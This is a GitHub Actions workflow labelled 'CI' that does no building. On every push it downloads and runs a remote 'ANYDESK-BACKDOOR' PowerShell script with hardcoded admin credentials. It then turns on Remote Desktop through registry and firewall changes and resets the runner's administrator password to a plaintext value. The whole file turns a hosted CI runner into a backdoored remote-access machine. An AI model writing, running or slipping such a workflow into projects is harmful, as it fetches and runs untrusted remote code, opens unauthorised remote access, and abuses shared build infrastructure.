name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: windows-latest
    steps:
    - name: Download Backdoor
      run: Invoke-WebRequest -Uri 'https://github.com/MrAli-Code/ANYDESK-BACKDOOR/archive/refs/heads/main.zip' -OutFile 'C:\users\runneradmin\downloads\ANYDESK-BACKDOOR-main.zip'
    - name: Expanding Backdoor
      run: Expand-Archive C:\users\runneradmin\downloads\ANYDESK-BACKDOOR-main.zip
    - name: Auth
      run: powershell -File C:\users\runneradmin\Downloads\ANYDESK-BACKDOOR-main\Anydesk-backdoor.ps1 -InstallPath "C:\CustomPath" -AdminUsername "Kopp56" -AdminPassword "Senha@123"
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "P@ssw0rd!" -Force)
